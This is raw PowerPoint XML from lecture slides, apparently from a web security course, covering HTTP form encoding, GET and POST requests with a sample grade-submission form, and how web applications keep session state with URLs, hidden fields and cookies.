            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute or the user-supplied input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empty string if neither is present</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 9.28.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798" y="3260138"/>
            <a:ext cx="1930400" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40961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rmAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All name-value pairs of the form are encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encodes the name-value pairs using percent encoding </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Except that spaces are translated to + instead of %20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo=bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple name-value pairs separated by ampersand (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139842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rmAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="student" value="bar"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="class"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="grade"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit?student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Adam+Doupé&amp;class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=cse+591&amp;grade=A%2B&amp;submit=Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 9.35.12 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="998"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4125853"/>
            <a:ext cx="6299200" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-01-15 at 9.3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680655"/>
            <a:ext cx="6299200" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335582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Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Originally envisioned as a way to share research results and information at CERN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Combined multiple emerging technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Hypertext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Internet (TCP/IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Idea grew into “universal access to a large universe of documents”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354732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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="student" value="bar"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="class"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="grade"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>POST /grades/submit HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xhtml+xml,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Content-Length: 68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>student=Adam+Doup%C3%A9&amp;class=cse+591&amp;grade=A%2B&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Submit+Query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 9.5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28" y="3005427"/>
            <a:ext cx="6426200" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3689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Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>It was quickly realized that the way the web was structured allowed for returning dynamic responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Early web was intentionally designed this way, to allow organizations to offer access to a database via the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Basis of GET and POST also confirm this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>GET "SHOULD NOT have the significance of taking an action other than retrieval"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Safe and idempotent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Annotation of existing resources; posting a message to a bulletin board, newsgroup, mailing list, or similar group of articles, providing a block of data, such as the result of submitting a form, to a data-handling process; and extending a database through an append operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196320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Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server-side code to dynamically create an HTML response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>How does this differ from a web site?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>In the HTTP protocol we've looked at so far, each request is distinct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server has client IP address and User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47929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Maintaining State</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>HTTP is a stateless protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>However, to write a web application we would like maintain state and link requests together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>The goal is to create a "session" so that the web application can link requests to the same user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Allows authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Rich, full applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Three ways this can be achieved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Embedding information in URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Using hidden fields in forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Using cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2374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a:t>Embedding Information in Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Cookies are state information that is passed between a web server and a user agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server initiates the start of a session by asking the user agent to store a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Server or user agent can terminate the session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>Cookies first defined by Netscape while attempting to create an ecommerce application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>RFC 2109 (February 1997) describes first standardization attempt for cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>RFC 2965 (October 2000) tried to standardize cookies 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>RFC 6265 (April 2011) describes the actual use of cookies in the modern web and is the best reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
